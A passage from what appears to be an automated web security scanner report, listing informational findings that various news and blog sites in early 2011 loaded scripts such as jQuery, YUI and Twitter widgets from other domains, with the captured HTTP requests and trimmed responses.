The response dynamically includes the following script from another domain:

Request

GET /b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx HTTP/1.1
Host: blogs.msdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+29+Jan+2011+23%3a22%3a07+GMT; expires=Sun, 29-Jan-2012 23:22:07 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
X-Pingback: http://blogs.msdn.com/b/delay/pingback.aspx
X-AspNet-Version: 2.0.50727
Set-Cookie: AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; expires=Sun, 30-Jan-2011 23:22:07 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 29 Jan 2011 23:22:07 GMT
Content-Length: 75605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
   <script type="text/javascript" charset="utf-8" src="http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady"></script>
...[SNIP]...

23.32. http://blogs.nature.com/news/thegreatbeyond/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.nature.com
Path:   /news/thegreatbeyond/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/thegreatbeyond/ HTTP/1.1
Host: blogs.nature.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:06 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sun, 30 Jan 2011 02:06:06 GMT
Content-Length: 95929
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/duke_cancer_trials_allegedly_l_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/duke_cancer_trials_allegedly_l_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/gates_uk_government_pledge_to.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/gates_uk_government_pledge_to.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/un_secretary_general_to_quit_c.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/un_secretary_general_to_quit_c.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/lhc_will_run_to_end_of_2012.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/lhc_will_run_to_end_of_2012.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/letters_to_congress_confirm_fa.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/letters_to_congress_confirm_fa.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/biology_teachers_often_dismiss.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/biology_teachers_often_dismiss.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/missing_nerve_agent_caused_arm.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/missing_nerve_agent_caused_arm.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/vaccination_could_control_chol_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/vaccination_could_control_chol_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/picture_post_world_map_of_scie_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/picture_post_world_map_of_scie_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/nih_shores_up_plan_to_axe_reso.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/nih_shores_up_plan_to_axe_reso.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/no_link_found_between_abortion_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/no_link_found_between_abortion_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/corruption_at_the_global_fund_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/corruption_at_the_global_fund_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>


<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/new_house_science_committee_ro_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/new_house_science_committee_ro_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

23.33. http://bodyodd.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bodyodd.msnbc.msn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: bodyodd.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:06:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109649

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>The Body Odd</title>
<met
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/35d54aa8a266172106b14b7b5f025fbaf0483999.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/4639ed5cc4939229aab8af2f9c2f54ca70283148.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/bodyodd/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.34. http://boyle.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boyle.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: boyle.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:51:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b765ed910b57120efaf7c192ef14af0a; expires=Sat, 25-Jan-2031 17:51:08 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 88050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.35. http://cartoonblog.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cartoonblog.msnbc.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: cartoonblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:06:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96162

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cartoon Blog</title>
<met
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/b996a95765341bcacd7b67b91e89f032f4aeb0d2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.36. http://cartoonblog.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cartoonblog.msnbc.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: cartoonblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 17:51:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93848

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cartoon Blog</title>
<met
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fe8eea9fd9019c30471999651230cb61bfef5ba8.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.37. http://channel9.msdn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://channel9.msdn.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: channel9.msdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:11 GMT
Connection: close
Content-Length: 81079

<!doctype html>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <meta name="robots" content="index,follow"/>
   <title>Channel 9: Videos about the people buildi
...[SNIP]...
<![endif]-->

       <script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

23.38. http://college.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://college.scout.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: college.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 69563

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>College Team Directory Front Page</title>
<meta http
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.39. http://collegebasketball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://collegebasketball.scout.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: collegebasketball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sun, 30 Jan 2011 02:06:12 GMT
ETag: "1CBC02244730200"
Content-Type: text/html
Content-Length: 43257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.40. http://collegefootball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://collegefootball.scout.com
